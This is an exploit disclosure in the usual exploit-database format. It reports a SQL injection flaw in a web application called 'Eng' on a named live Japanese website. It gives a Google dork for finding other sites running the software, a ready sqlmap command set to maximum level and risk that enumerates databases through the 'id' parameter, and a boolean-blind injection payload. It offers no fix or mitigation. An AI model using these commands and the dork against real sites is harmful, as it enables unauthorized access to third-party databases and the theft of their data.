****************************
#Exploit Title: ENG - SQL Injection vulnerability
#Date: 2020-10-23
#Exploit Author: Mahdi Karimi
#Vendor Homepage: https://eng.nihongodecarenavi.jp
#Google Dork: "Powered by Eng"
#Tested On: windows 10
sqlmap:
sqlmap -u "https://eng.nihongodecarenavi.jp/category/category-list.php?id=86" --level=5 --risk=3 --dbs --random-agent
Testing Method;
- boolean-based blind
Parameter: id (GET)
Type: boolean-based blind
Title: HAVING boolean-based blind - WHERE, GROUP BY clause
Payload: id=86 HAVING 2301=2301
**************************************************
#Discovered by: Mahdi Karimi
#Email : mjoker22mjoker22@gmail.com
**************************************************